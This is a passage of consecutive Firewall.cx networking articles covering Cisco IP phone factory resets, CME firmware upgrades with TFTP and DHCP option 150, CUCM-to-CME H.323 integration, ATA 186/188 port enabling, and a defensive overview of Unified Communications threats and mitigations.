  • any key between 0 and 9
  • * (star) key
  • # (hash) key

Follow the steps below to successfully factory reset your Cisco 7920 IP phone:

  1. Choose Menu > Phone Settings > Factory Default.
  2. The phone displays the Restore to Default? message. Press the OK softkey. All settings are deleted.
  3. Choose Menu > Network Config in order to reconfigure the network settings for your WLAN.

This completes the factory reset procedure for all Cisco 7940, 7941, 7942, 7960, 7961, 7962 and 7920 IP phones.


CallManager Express Setup for IP Phone Firmware Upgrade - How to Upgrade Your Cisco IP Phone Firmware

This article will show how to configure CallManager Express (CME) for the IP phone firmware upgrade process. Upgrading your Cisco IP phones is generally a good practice, especially when upgrading your CallManager or CallManager Express version, as it will ensure all new options and features supported by your CallManager/CME system are also available to your IP phones.

Upgrading your Cisco IP phone firmware is a very simple process, however special consideration must be taken into account when upgrading to the latest firmware.

If the Cisco Unified IP phone is currently running firmware earlier than 6.0(2) and you want to upgrade to 8.x(x), you must first install an intervening 7.0(x) load to prevent upgrade failure.

Cisco recommends using the most recent 7.0(3) load as the intervening load to avoid lengthy upgrade times.

If the Cisco Unified IP phone is currently running firmware 6.0(2) to 7.0(2) and you want to upgrade to 8.x(x), you can do so directly. However, expect the upgrade to take twice as long as usual.

Step 1: Download The Correct Firmware

To download Cisco IP Phone firmware from Cisco.com, a valid Cisco CCO account is required. In most cases, the firmware file name is something similar to the following:  cmterm-7945_7965-sccp.9-2-1.tar.  From the file name, we can understand that this is firmware version 9.2.1, for Cisco 7945 and 7965 SCCP IP phones.

Firewall.cx readers can visit our free Cisco IP Phone & ATA Firmware Download section to freely download the latest available firmware for their Cisco IP phones.

Step 2: Upload Firmware Files To CallManager Express Flash Storage

Next, the firmware must be uploaded and unpacked on our CME router. For this, we’ll need a TFTP server running on a workstation, plus access to the CME router.  From the CME prompt, we instruct the router to download the firmware and unpack it onto our CME flash:

R1# archive tar /xtract tftp://10.0.0.10/cmterm-7945_7965-sccp.9-2-1.tar flash:
Loading cmterm-7945_7965-sccp.9-2-1.tar from 10.0.0.10 (via FastEthernet0/0): !
extracting apps45.9-2-1TH1-13.sbn (4639974 bytes)!!!!!!!!!!!!!!!!!!
extracting cnu45.9-2-1TH1-13.sbn (575590 bytes)!!
extracting cvm45sccp.9-2-1TH1-13.sbn (2211969 bytes)!!!!!!!!!
extracting dsp45.9-2-1TH1-13.sbn (356907 bytes)!
extracting jar45sccp.9-2-1TH1-13.sbn (1886651 bytes)!!!!!!!
extracting SCCP45.9-2-1S.loads (656 bytes)
extracting term45.default.loads (660 bytes)
extracting term65.default.loads (660 bytes)
[OK - 9680896 bytes]

When complete, the system’s flash should contain all 8 files as shown above.
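To double-check that the extraction succeeded, the flash contents can be filtered with the IOS dir command; a small sketch (the filter strings simply match this firmware release):

R1# dir flash: | include 9-2-1
R1# dir flash: | include default.loads

All extracted .sbn and .loads files should be listed; if any are missing, repeat the archive tar /xtract step before continuing.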

Step 3: Configure The CallManager Express TFTP Server To Serve The Firmware Files & Setup DHCP Server (option 150)

Now we must configure CME’s tftp server to ‘serve’ these files so that the IP phones can request them.  This is done by adding the following commands to the router’s configuration:

R1(config)# tftp-server flash:apps45.9-2-1TH1-13.sbn
R1(config)# tftp-server flash:cnu45.9-2-1TH1-13.sbn
R1(config)# tftp-server flash:cvm45sccp.9-2-1TH1-13.sbn
R1(config)# tftp-server flash:dsp45.9-2-1TH1-13.sbn
R1(config)# tftp-server flash:jar45sccp.9-2-1TH1-13.sbn
R1(config)# tftp-server flash:SCCP45.9-2-1S.loads
R1(config)# tftp-server flash:term45.default.loads
R1(config)# tftp-server flash:term65.default.loads

We also must ensure there is a valid DHCP server running with option 150 set to CME’s IP address. When the IP phone boots up, it will look for a DHCP server that will provide it with an IP address, but also expect to find DHCP option 150 which designates the CME the phone should try to register with:

ip dhcp excluded-address 10.0.0.1  10.0.0.15
!
ip dhcp pool Firewall.cx
 network 10.0.0.0 255.255.255.0
 dns-server 10.0.0.1 8.8.8.8
 default-router 10.0.0.1
 option 150 ip 10.0.0.1

The above configuration excludes IP address ranges 10.0.0.1 to 10.0.0.15 from being handed out by the DHCP server. It also creates a DHCP scope named Firewall.cx and configures various self-explanatory parameters including the critical DHCP option 150, which represents the CME the IP phone should try to register to.
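Once a phone has booted, the DHCP side can be verified with the following commands; a quick sketch using the pool defined above:

R1# show ip dhcp binding
R1# show running-config | section ip dhcp pool

The first command lists the addresses actually leased to the phones, while the second displays the pool configuration, including the option 150 statement.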

Step 4 – Configure CallManager Express To Use New Firmware Upon Next IP Phone Bootup

The final step involves configuring CME to use the new firmware and instruct IP phones to download it. This is done by issuing the following commands under the telephony-service section of CME:

R1(config)# telephony-service
R1(config-telephony)# load 7945 SCCP45.9-2-1S
R1(config-telephony)# create cnf
Creating CNF files...

The load command is followed by the phone type and the associated firmware (.loads) file. Notice we do not include the .loads extension of the filename at the end of the command.

The create cnf command instructs CME to recreate the XML files that the IP phones use to download all necessary network parameters; it also forces them to check their firmware and begin downloading the new one.
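Registered phones normally pick up the new load on their next reboot. To push a specific phone to reboot immediately, the following sketch can be used (it assumes ephone 1 is already configured on this CME):

R1(config)# ephone 1
R1(config-ephone)# reset

The reset command fully reboots the phone, forcing it to re-request its configuration and firmware, whereas restart performs a quicker re-registration that does not trigger a firmware check.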

This completes our article on configuring Cisco CallManager Express for Cisco IP Phone Firmware upgrade.




How to Register Cisco IP Phones & Connect CallManager (CUCM) Cluster with CME or UC520, UC540, UC560 via H.323 Gateway

This article shows how to connect Cisco's Unified CallManager with a CallManager Express system (including UC520, UC540 and UC560) via an H.323 gateway, allowing the two systems to route calls between each other. This scenario is typically used between remote offices running CallManager Express that need to connect to their Headquarters running on CallManager.

Our example network assumes there is a direct connection between the two CallManager systems via leased line as shown in the diagram below:

connecting Cisco CUCM with CallManager Express via h323 trunk

Engineers who wish to establish a VPN connection instead (via Internet) can refer to the following popular VPN articles:

The above network diagram was designed using GNS3 in a simulated environment consisting of two call-control systems: at the Headquarters, a CallManager (CUCM) cluster with an IP Communicator client (CIPC_HQ) assigned extension 2002, and at the remote branch, a CallManager Express system with an IP Communicator client (CIPC_BR) assigned extension 5010.

To simplify things, our CME router is directly connected with the Headquarters router (CUCM_HQ), providing a path for us to reach the main CallManager (192.168.10.11).

While CallManager (Headquarters) requires a voice gateway to make and receive calls on the PSTN/ISDN network (Telco Providers), it is not a requirement for intra-site communication.

We assume the CME router has no existing configuration and that only a basic configuration exists on CallManager.

Configuring CallManager Express or UC500 Series System

Following is the CallManager Express router configuration covering its LAN and WAN configuration:

interface FastEthernet0/0
 ip address 192.168.20.1 255.255.255.0
 duplex half
 h323-gateway voip interface
 h323-gateway voip bind srcaddr 192.168.20.1
!
interface Serial1/0
 ip address 172.16.1.2 255.255.255.252
 serial restart-delay 0
!
ip route 0.0.0.0 0.0.0.0 172.16.1.1

The h323-gateway voip interface and h323-gateway voip bind srcaddr commands define the source interface and IP address for all H.323 protocol communications and are necessary to ensure VoIP communication with CUCM.

Next, we enable the CallManager Express service and configure our single IP phone (IP Communicator) that will be used for our test:

!
telephony-service
 max-ephones 1
 max-dn 1
 ip source-address 192.168.20.1 port 2000
 auto assign 1 to 1
 max-conferences 4 gain -6
 transfer-system full-consult
 create cnf-files version-stamp Jan 01 2002 00:00:00
!
ephone-dn  1  dual-line
 number 5010
!
ephone  1
 no multicast-moh
 mac-address 000C.296C.C0C4
 keepalive 30 auxiliary 0
 type CIPC
 button  1:1
!

The CallManager Express service is enabled via the telephony-service command, with the important ip source-address subcommand defining the source IP address of the CallManager Express system. In case the CME router has multiple interfaces connected to various networks (VLANs), we set the source IP address to be that of the Voice VLAN, so the CME router will use the correct interface (and therefore source IP address) to communicate with its clients (IP phones).
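As an illustrative sketch only (the Vlan20 interface and its addressing are assumptions and not part of the lab above), a CME router with a dedicated Voice VLAN would bind the service to that VLAN's SVI address:

interface Vlan20
 description Voice VLAN
 ip address 10.10.20.1 255.255.255.0
!
telephony-service
 ip source-address 10.10.20.1 port 2000

This way SCCP registrations and keepalives are always sourced from the Voice VLAN address the IP phones expect to reach.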

To register our IP Communicator with CME, we create an ephone directory number (ephone-dn), which defines the extension number, and an ephone entry, which represents our physical IP phone (via its MAC address). Those wanting more information on how extensions are mapped to physical IP phones can visit our Cisco CallManager Express Basic Concepts - Part 2 article.

With the above configuration complete, the IP Communicator phone should register on CME and receive its extension. Keep in mind that it is necessary to configure the TFTP Server IP address to that of the CME under the Preferences > Network settings in IP Communicator.

Finally, all that is left is to configure a dial-peer that would direct all calls to CallManager at our Headquarters. This is done by using dial-peers as shown below:

dial-peer voice 1 voip
 destination-pattern 2...
 session target ipv4:192.168.10.11

This dial-peer instructs CallManager Express to forward any calls made to any four digit number starting with 2, e.g. 2000, 2452, 2900 etc, to IP address 192.168.10.11, our headquarters CallManager.
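To confirm which dial-peer CME will select for a given dialed number, the show dialplan number command can be used; a quick sketch (the CME hostname is assumed):

CME# show dialplan number 2002

The output should list the matching voip dial-peer, in this case dial-peer 1 with its session target of ipv4:192.168.10.11.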

Dial-peers are an essential ingredient to managing outgoing and incoming calls and will be covered in greater depth in another article.

This completes our CallManager Express configuration. We are now ready to move on to our CallManager configuration.

Configuring CallManager (CUCM)

Configuring CallManager involves a number of easy-to-follow steps as outlined below. As shown in the network map, we've assigned extension number 2002 to the IP Communicator connected to the system. This phone will be accepting incoming calls from the remote CallManager Express system.

The first step is to check that the Cisco CallManager and Cisco TFTP services are activated. This can be done by visiting Cisco Unified Serviceability > Tools > Service Activation, as shown below:

Cisco cucm enable tftp option 150

Here we will need to enable the mentioned CM Services by selecting them and clicking on Save.

If IP Communicator is not already connected and registered to CallManager, we can automate this process by going to Cisco Unified CM Administration > System > Cisco Unified CM Configuration:

Here, uncheck the box Auto-registration Disabled on this Cisco Unified Communications Manager. This will allow any IP phone (CIPC - IP Communicator in our case) to register and be automatically assigned an extension. This is a very easy and painless method to register IP phones on a CallManager system.

Now, to configure CIPC with extension 2002, we go to Device > Phones > Add New > Phone Type and select Cisco IP Communicator.

Next, go to Device Name (Select the MAC address of CIPC), and for the field Softkey Template select Standard CIPC SCCP:

Cisco cucm ip phone configuration

Scrolling down the page, you'll come across the SUBSCRIBE Calling Search Space field. Click on it and select Cisco IP Communicator:

cisco-voice-cucm-cme-4

Click on Save, then choose Directory Number Configuration, enter 2002 or the desired extension, then reset the phone to allow the successful registration of CIPC with CallManager:

cisco-voice-cucm-cme-5

Setting Up H.323 Gateway on CallManager

With the IP phone registered we now need to setup the H.323 gateway.

Setting up an H.323 gateway in CallManager is a straightforward process. From the main menu, select: Device > Gateways > Add New > Gateway Type  and select H.323 Gateway.

When selecting the H.323 Gateway, we need to provide a bit more information before it is usable by the system.

In the field Device Name and Description, enter the IP address of the remote CME system, 192.168.20.1.

Next, click on the Device Pool field and select Default. Finally click on Save and Reset to have the changes take effect:

cisco-voice-cucm-cme-6

Configuring CallManager Route Group, Route List & Route Pattern

Our next step is to configure a Route Group, Route List and finally Route Pattern. This is a similar process to CME's dial-peer configuration but it's slightly more complicated in CallManager.

From the main menu, go to Call Routing > Route/Hunt > Route Group > Add New > Add Available Device and select the newly created H.323 Gateway. Click on Add To Route Group, then click on Save.

cisco cucm route group configuration

Now we go to Call Routing > Route/Hunt > Route List > Add New. For the Name we used Route to 5xxx to help distinguish this route list. In the Cisco Unified Communication Manager Group drop-down option select Default, then click on Save.

Right below we see the Route List Member Information section. Here we click on the Add Route Group button:

cisco-voice-cucm-cme-8

At the new screen select the Route Group field and choose WAN Devices-[NON-QSIG], then click on Save:

cisco-voice-cucm-cme-9

Finally we configure the Route Pattern. Go to Call Routing > Route/Hunt > Route Pattern > Add New > Route Pattern and enter 5XXX.  The pattern "5XXX" is similar to CallManager Express's "2..."  and will match any four digit number starting with 5.

Below, at the Gateway/Route List, select Route to 5xxx and uncheck Provide Outside Dial Tone. Finally, click on Save:

cisco cucm route pattern configuration

At this point CallManager has been configured to route all 5xxx extensions to the remote CallManager Express system and both systems should be able to communicate with each other.

About The Author

Mohammad Saeed is a guest writer on Firewall.cx, freelancer and video trainer, who loves working with Cisco technologies. As a CCNA & CCNP certified engineer, Mohammad works with small and medium size networking projects and helps students and network engineers to understand Cisco topics.


IP Phone 7945, 7965, 7975 Factory Reset Procedure, SCCP Firmware Upgrade & CME DHCP Server Setup

This article explains how to reset your Cisco 7945, 7965 and 7975 IP phone to factory defaults, and how to upgrade the firmware to the latest available version. We also provide necessary information on how to setup a DHCP server on a CME router or Cisco Catalyst switch, to support Cisco IP Phones and provide them with DHCP Option 150 so they know where to find and register with the CallManager or CallManager Express server.

According to Cisco, when initiating a factory reset procedure certain information from the IP phone is erased while other information is reset to the factory default value, as shown in the list below:

Information Erased:

  • CTL File (Certificate Trust List)
  • LSC File (Locally Significant Certificate)
  • IP Phone Call History (Calls Received, Placed, Missed etc)
  • Phone application

Information Reset to Default:

  • User configuration settings (ring tone, screen brightness, sound levels etc)
  • Network configuration settings

It is highly advisable to follow the firmware upgrade procedure in a non-working environment to ensure other phones are not affected (in case of an accidental reboot), and to avoid the freshly factory-reset IP phones obtaining the working environment’s settings.

Cisco IP phone SCCP firmware files version 9.2.1 for 7945, 7965 & 7975 IP phones (latest version at the time of writing this article) are available at our Cisco IP Phone & ATA Firmware Download section. For our example, we used version 9.1.1.

Firewall.cx readers can visit our free Cisco IP Phone & ATA Firmware Download section to freely download the latest available firmware for their Cisco IP phones.

Things To Consider Before Factory Resetting Your Cisco IP Phone

When performing the factory reset procedure we are about to describe it is important to keep in mind that the IP phone will lose all configuration files and phone application. This means that it is necessary to have CallManager or CallManager Express setup so that the IP phone will be able to receive the new information (phone application and configuration) after the reset procedure is complete, because it is likely the IP phone will not be usable until this information is loaded.

This preparation also happens to be the procedure for upgrading a Cisco IP phone firmware.

Configuring CallManager Express (CME) For IP Phone Firmware Upgrade

Upgrading your Cisco IP phone firmware is a very simple process. Special consideration must be taken into account when upgrading to the latest firmware.

If the Cisco Unified IP phone is currently running firmware earlier than 6.0(2) and you want to upgrade to 8.x(x), you must first install an intervening 7.0(x) load to prevent upgrade failure.

Cisco recommends using the most recent 7.0(3) load as the intervening load to avoid lengthy upgrade times.

If the Cisco Unified IP phone is currently running firmware 6.0(2) to 7.0(2) and you want to upgrade to 8.x(x), you can do so directly. However, expect the upgrade to take twice as long.

Step 1 – Download the Appropriate Firmware

To download Cisco IP Phone firmware a valid Cisco CCO account is required. In most cases, the firmware file name is something similar to the following:  cmterm-7945_7965-sccp.9-1-1.tar.  From the file name, we can understand that this is firmware version 9.1.1, for Cisco 7945 and 7965 SCCP IP phones.

Step 2 – Upload Firmware to CallManager Express

Next, the firmware must be uploaded and unpacked on our CME router. For this, we’ll need a TFTP server running on a workstation, plus access to the CME router.  From the CME prompt we instruct the router to download the firmware and unpack it onto our CME flash:

R1# archive tar /xtract tftp://10.0.0.10/cmterm-7945_7965-sccp.9-1-1.tar flash:
Loading cmterm-7945_7965-sccp.9-1-1.tar from 10.0.0.10 (via FastEthernet0/0): !
extracting apps45.9-1-1TH1-16.sbn (4639974 bytes)!!!!!!!!!!!!!!!!!!
extracting cnu45.9-1-1TH1-16.sbn (575590 bytes)!!
extracting cvm45sccp.9-1-1TH1-16.sbn (2211969 bytes)!!!!!!!!!
extracting dsp45.9-1-1TH1-16.sbn (356907 bytes)!
extracting jar45sccp.9-1-1TH1-16.sbn (1886651 bytes)!!!!!!!
extracting SCCP45.9-1-1S.loads (656 bytes)
extracting term45.default.loads (660 bytes)
extracting term65.default.loads (660 bytes)
[OK - 9680896 bytes]

When complete, the system’s flash will contain all 8 files extracted above.

Step 3 – Configure The CallManager Express TFTP server to serve these files & Setup DHCP Server (option 150)

Now we must configure CME’s tftp server to ‘serve’ these files so that the IP phones can request them.  This is done by adding the following commands to the router’s configuration:

R1(config)# tftp-server flash:apps45.9-1-1TH1-16.sbn
R1(config)# tftp-server flash:cnu45.9-1-1TH1-16.sbn
R1(config)# tftp-server flash:cvm45sccp.9-1-1TH1-16.sbn
R1(config)# tftp-server flash:dsp45.9-1-1TH1-16.sbn
R1(config)# tftp-server flash:jar45sccp.9-1-1TH1-16.sbn
R1(config)# tftp-server flash:SCCP45.9-1-1S.loads
R1(config)# tftp-server flash:term45.default.loads
R1(config)# tftp-server flash:term65.default.loads

We also need to ensure there is a valid DHCP server running with option 150 set to CME’s IP address. In our example, this is IP address 10.0.0.1. When the IP phone boots up, it will look for a DHCP server that will provide it with an IP address, but also expect to find DHCP option 150 which designates the CME the phone should try to register with:

ip dhcp excluded-address 10.0.0.1  10.0.0.15
!
ip dhcp pool Firewall.cx
 network 10.0.0.0 255.255.255.0
 dns-server  10.0.0.1 8.8.8.8
 default-router 10.0.0.1
 option 150 ip 10.0.0.1
!

The above configuration excludes IP address ranges 10.0.0.1 to 10.0.0.15 from being handed out by the DHCP server. It also creates a DHCP scope named Firewall.cx and configures various self-explanatory parameters including the critical DHCP option 150, which represents the CME the IP phone should try to register to.

Step 4 – Configure CallManager Express to use new Firmware on Next IP Phone Bootup

The final step involves configuring CME to use the new firmware and instruct IP phones to download it. This is done by issuing the following commands under the telephony-service section of CME:

R1(config)# telephony-service
R1(config-telephony)# load 7945 SCCP45.9-1-1S
R1(config-telephony)# create cnf
Creating CNF files...

The load command is followed by the phone type and the associated firmware (.loads) file. Notice we do not include the .loads extension of the filename at the end of the command.

The create cnf command instructs CME to recreate the XML files that will be used by the IP phone to download all necessary network parameters and force it to check its firmware and begin downloading the new one.

When our IP phone next reboots, it will download the latest firmware installed on the CME router and begin the upgrade process.
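If the phone does not start upgrading, it is worth confirming what CME's TFTP server is actually offering and whether the phone is requesting files at all. A small troubleshooting sketch (debug output can be verbose, so use it with care on production routers):

R1# show telephony-service tftp-bindings
R1# debug tftp events

The first command lists every configuration and firmware file bound to CME's TFTP server, while the debug displays each file the IP phone requests as it boots.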

Performing the Factory Reset on Cisco 7945, 7965, 7975 IP Phone

Follow the steps below to successfully Factory reset your Cisco IP phone:

  1. Unplug the power cable from the IP phone and then plug it back in.
  2. While the phone is powering up, and before the Speaker button flashes on and off, press and hold the hash # key.
  3. Continue to hold # until each line button (right of the LCD screen) flashes on and off in sequence in orange colour.
  4. Now release the hash # key and type the following sequence 123456789*0#

After the sequence has been entered the line buttons on the phone flash orange, then green and the phone goes through the factory reset process. This process can take several minutes and the firmware of the IP Phone will be erased.

When complete, the IP phone will reboot and the bootloader will try to obtain an IP address via DHCP. The IP phone also expects the IP address (option 150) or the name (option 66) of the TFTP server to be delivered by the DHCP server. This is why these DHCP options are critical at this phase.
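On an IOS DHCP server both options can be supplied if desired; a minimal sketch extending the pool shown earlier (the option 66 line is an optional assumption, used only if the string form is preferred):

ip dhcp pool Firewall.cx
 option 150 ip 10.0.0.1
 option 66 ascii "10.0.0.1"

Option 150 is the Cisco-preferred method and can carry one or more TFTP server IP addresses, while option 66 carries a single TFTP server as a string.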

The phone then tries to obtain the appropriate termXX.default.loads file depending on its model:

  • term75.default.loads - Cisco 7975
  • term65.default.loads - Cisco 7965
  • term45.default.loads - Cisco 7945

This "loads" file indicates all the files the IP phone has to download from the TFTP server to make up the device firmware. The IP phone should first obtain the “loads” file and then proceed with the individual files. Once complete, the IP phone will install the files and finally reboot

Below is a screenshot of our 7945 IP phone during the firmware upgrade process:

cisco-ip-phone-7945-reset-1

The IP phone should now be ready for use with the new IP phone firmware installed.  The firmware can be verified by going to the phone Settings / Model Information menu option, where the load file installed is shown:

cisco-ip-phone-7945-reset-2

This article explained how to perform a factory reset for Cisco IP phones 7975, 7965 & 7945 models. We saw what information is lost during the reset, how to configure Cisco CallManager Express TFTP Server so that the updated SCCP firmware is automatically loaded on the IP phones and how to verify the IP phone firmware after the upgrade is complete.


How to Enable & Disable Phone Port Lines on Cisco ATA 186/188 for CallManager - CallManager Express

The Cisco ATA 186 and 188 analog phone adaptor is very common amongst Cisco CallManager (CUCM) & Cisco CallManager Express (CUCME) installations.

The ATA 186/188 provides two analog phone ports, allowing support for up to two analog phones and supports a number of features allowing an engineer to configure it according to the requirements and environment.

One neat feature is the ability to disable one of the two analog phone ports, something administrators might want to do if the second phone port is not used, providing an additional security measure.

On the other hand, a couple of second-hand ATA’s might fall into your hands and, upon testing, you may find that only one phone port works – this doesn’t necessarily mean the second phone port is faulty!

When an ATA 186/188 registers on either CallManager or CallManager Express (CME), two MAC addresses appear in the device section.

Let’s take CME for example:

CME identify ATA 186 188 phone ports

When an ATA 186/188 is registered with CUCM or CUCME, the system will show two new MAC addresses. The first is the actual MAC address of the ATA device. This represents Phone Port No.1.

The second MAC address is similar to the first but with a ‘01’ appended at the end. The whole MAC address is then shifted to the left by two positions, as shown in the above screenshot. This second MAC address represents Phone Port No.2.

When a phone port is disabled, for example Phone Port No.2, the second MAC address ending in ‘01’ will no longer register. If removed from the CUCM/CME system, it will not appear again until the port is re-enabled.
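As an illustrative example (the MAC address below is made up), applying the rule described above:

Phone Port No.1:  00070E123456
Phone Port No.2:  070E12345601  (first two hex digits dropped, '01' appended)

Only this derived identifier changes; the ATA itself still has a single burned-in MAC address on its Ethernet interface.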

How to Enable – Disable Cisco ATA Phone Port No.1 or No.2

The first step is to try resetting the ATA to its factory default setting. This is fully covered in our ATA 186/188 Upgrade and Factory Reset article.

In many cases a factory reset might not prove to be that useful, in which case manual configuration of the ATA parameter SID is required. To do this, open a web browser and connect to the ATA using its IP address, e.g. http://192.168.135.5. From the web interface, select SCCP Parameters under the Change Configuration menu option.

At the presented page, Phone 1 and Phone 2 ports at the back of the ATA are represented by the SID0 and SID1 field respectively.

To enable a port, simply enter a dot “.” as a parameter, or “0” to disable it. Simple as that!

The screenshot below helps make this practice clearer:

Cisco ata186 188 web gui

Of course, it is always highly recommended to upgrade to the latest ATA firmware version to ensure stability and enhanced functionality of the Cisco ATA 186/188 device. The latest Cisco ATA 186/188 firmware is freely available in our Cisco Download section.


Risk Management for Cisco Unified Communication Solutions - Countermeasures & Mitigation

As technology has advanced, things have become simpler yet more complex. One prime example is that of today’s communication networks. With the evolution of VoIP, the most obvious convergence is that of voice and data networks wherein both types of traffic leverage the same physical infrastructure, while retaining a possible logical network separation. While this whole concept seems very exciting, there’s a big tradeoff in terms of security!

It’s unfortunate but true that converged communication solutions are, more often than not, deployed without much regard for the underlying security issues. In most cases, organizations tend to either ignore the security aspect of their Unified Communication (UC) network or underestimate its importance. As a result, a host of threats and attacks which used to be relevant only to data networks now pester the voice implementation that leverages the underlying data network. Moreover, the existing security solutions which were designed for data networks cannot adequately meet the new security challenges where voice meets data.

Unified Communications (UC), also referred to as IP Telephony, brings along a host of new security risks that cannot be resolved by existing security measures or solutions. While UC risk mitigation strategies are just beginning to become known, UC threat mitigation entails significant costs, or otherwise translates into a cost of security that should be taken into account when designing the corporate UC security strategy. The first step to mitigate any risk is to know which of your assets are worth protecting and what types of risks you should avert.

Let’s first understand the fundamentals of risk management.

UC Risk Management – Overview

Risk management is an art in itself as it spans multiple domains. Ideally, every asset in your UC network should be identified before going through risk management for your Cisco UC solution. This is important since it will identify what is most important to a business and where investment of time, manpower, and monetary resources will yield most favorable results. The assets that can be selected in a typical Cisco UC environment are (not limited to):

  1. Cisco Unified Communications Manager (CUCM)
  2. Cisco Unity Connection (CUC)
  3. Cisco Unified Presence Server (CUPS)
  4. Cisco Unified Communications Manager Express (CUCME)
  5. Cisco Unity Express (CUE)
  6. Cisco Voice Gateways
  7. Cisco Unified IP Phones (wired, wireless, softphones)
  8. Cisco Unified Border Element
  9. Cisco Catalyst Switches
  10. Cisco IOS Routers
  11. Cisco Adaptive Security Appliance (ASA)

Once the elements of your Cisco UC solution are identified, it’s time to give them their risk ratings, based on your risk appetite.

Let’s start by defining risk.

Risk – the probability of something going wrong while conducting business as usual, with a negative impact.

Now, while you may know that your call-control - CUCM for example - is not secure and can be compromised, you are essentially bearing the risk that a known or an unknown threat may be realized. In other words, you are setting your risk appetite. Risk appetite may be classified into 3 major categories:

  • Risk aversion – Averting risks, adopting security where possible, high cost affair
  • Risk bearing – knowing that the network could be attacked, still bearing risk, least cost affair
  • Risk conforming – knowing that the network could be attacked, bearing risk to a minimal degree by implementing most critical security measures only, a balance between risk and cost

Next comes the risk rating, i.e. how you wish to rate the criticality of an element of Cisco UC solution to the operations of your network. For example, if CUCM is under attack, what will be the impact of the same on your network? Or, if an edge router is attacked, how do you expect the communication channels to be impacted?

Each application, device and endpoint should be given a risk rating which can be low, moderate or high. The Figure below depicts risk impact vs. likelihood.

Risk Impact vs. Likelihood (ratings)

Let’s now understand the threats that lurk around your UC solution and could possibly prove detrimental to the operations of a UC network.

The Risks & The Threats

There are always bad guys out there waiting to inflict damage on your UC infrastructure for financial benefit, to prove their superiority to other hackers, or just for fun.

The table below gives an overview of various threats and the possibility of these threats maturing i.e. risk realization as well as the probable impact on an organization’s operations. Please note that these are the most commonly seen threats:

Threat Type and associated Risk of Impact:

  • Confidentiality: Leakage of sensitive information (eavesdropping); Identity theft (Spoofing)
  • Integrity: Identity theft (Spoofing); Compromised Information (Malformed packets, packet injection)
  • Availability: Service Outages (DOS, DDOS, SPIT); Lost Productivity (Bandwidth Depletion)
  • Service Theft: Excessive phone bills (Toll Fraud); Espionage (Call Hijacking)

Let’s take a closer look at each of these threats and their risk bearings.

Eavesdropping – gives the attacker the ability to listen and record private phone conversation(s). An attacker can eavesdrop on VoIP conversations by disconnecting a VoIP phone from the wall outlet and plugging in a laptop with a softphone or packet capture software (such as Wireshark), or by virtue of VLAN hopping attacks. Additionally, eavesdropping can be implemented using SIP proxy impersonation or registration hijacking. If this threat is realized, the risk of damage or disruption is high.

Identity Theft – can happen at various OSI layers, right from layer 2 through layer 7. Some examples are: MAC spoofing; IP spoofing; call-control / proxy / TFTP spoofing. There are freely available tools such as macmakeup, nemesis and so on which can help the attacker spoof an identity, in other words perform identity theft to trick the source or destination in a voice conversation into believing it is communicating with a legitimate person whilst it’s the attacker playing on behalf of a legitimate source. A typical example of such an attack is when an attacker spoofs the MAC address of a victim’s machine and registers his softphone. The attacker then has privileges equivalent to those of the victim and can conduct toll fraud (explained later in this article) or extract information from the softphone’s web server to launch a flurry of attacks on the voice infrastructure. If this threat is realized, the risk of damage or disruption is moderate to high (depending on the privilege the attacker gains based on the victim’s profile).

Compromised Information / Loss of Information: Every business has some confidential information which, if exposed to its competitor or leaked on the internet, can prove detrimental for the business. Moreover, incorrect information passed to a destination entity can result in the business running into issues. An attacker can compromise the information in voice calls by injecting malformed packets, modifying the RTP packets, or by eavesdropping the call (discussed earlier). Packet injection or malformation attacks are difficult to detect unless an integrity method / algorithm is implemented. If this threat is realized, the risk of impact is high.

Toll fraud – This has been a classic issue since PBX days and continues to be a real nuisance in the VoIP world. An attacker finds a way to place an external call to the victim’s call-control and “hairpin” it into an outgoing call to an external destination. This could be performed using DISA, via voicemail, by a compromised IP Phone (such as a softphone), or by simply having an insider forward the calls to a desired international destination. This attack can land an organization with a skyrocketing bill in no time. The level of risk for this threat is high.

Denial of service – A DOS attack prevents use of the corporate UC systems, causing loss of business and productivity. An attacker can initiate a war dialer, remote dialing, or manually launch multiple calls against a system. This in turn overloads the call-control system and depletes the bandwidth. The effect can range from legitimate users getting a busy tone when trying to dial any number, use voicemail or reach the IVR, to the system bandwidth being filled with unwanted traffic. The level of risk for this type of threat is medium.

Spam over IP Telephony (SPIT) – equivalent to email spam on data networks. It’s unsolicited and unwanted bulk messages sent / broadcast to an enterprise network’s end‐users. This causes the enterprise user’s voicemail box to be full and the endpoint to be busy with unwanted calls. These high‐volume bulk calls are very difficult to trace and inherently cause fraud and privacy violations.

Call Hijacking – UC endpoints / devices can be hijacked through a variety of hacking techniques, such as registration hijacking and call redirection. Rogue endpoints can enable a hacker to use the organization’s communication systems without authenticating to the call-control. This can lead to toll fraud and disrupt communications. Also, rogue endpoints or wireless access controllers (WLC) or wireless access points (WAP) can serve as a back door for attackers to gain entry to legitimate network zones and compromise call-control, voice messaging, presence, and other services. Level of risk for this type of threat is medium to high.

Mitigating Risks

A golden saying in the world of security is – Security is only as strong as the weakest link!

To ensure that your Cisco UC network is secure and can deter most threats while reducing the associated risks, a multi-level security construct is required. In other words, no single security solution can restrain all threats or risks; security at multiple levels within a network i.e. at endpoint, server, application, network, perimeter, and device level helps avert a host of threats.

It’s important to treat the development of a UC risk management program as a collaborative cross‐organizational project. Any actionable risk assessment needs: a comprehensive list of threats; feasibility of realization of each threat; a prioritization of mitigation actions for each of the potential threats. It’s most important that risks be managed and mitigated in line with corporate vision and continuity of essential operations when deploying UC systems.

Following are the leading practice recommendations to mitigate risks pertinent to various threats in a Cisco UC network:

  • Implement adequate physical security to restrict access to VoIP components; Voice and Data traffic segregation at VLAN level and, if possible, at firewall zone level.
  • Implement VoIP enabled firewall (application layer gateway) e.g. Cisco ASA.
  • If voice VLAN is propagated to a remote location, implement firewall zoning to separate inside from outside traffic.
  • Disable unused switch ports.
  • Implement DHCP snooping, Dynamic ARP Inspection (DAI), and port security features on Cisco Catalyst switches (a configuration sketch follows this list).
  • IP Phones located in public areas such as lobby, elevator, or hotel rooms, must be separated from employee/internal network by firewalls and ideally should have their own dedicated VLAN.
  • Implement 802.1x based network access control (NAC) using EAP-TLS where possible.
  • Implement scavenger QoS class for P2P and other unwanted traffic.
  • Secure telephony signaling using TLS and media SRTP (Cisco CAPF).
  • Encrypt signaling and media traffic for endpoints, gateways, trunks, and other ecosystem applications where possible.
  • Establish dedicated IDS for voice VLAN for traffic within campus and from remote sites (SPAN, RSPAN)
  • Secure voice messaging ports.
  • Utilize Cisco Malicious Call Identification (MCID) to tag and list malicious calls.
  • Implement a call accounting/reporting system such as CAR or third party billing software to view call activity on an ongoing basis.
  • Implement strong password and PIN policies as well as OTP policies.
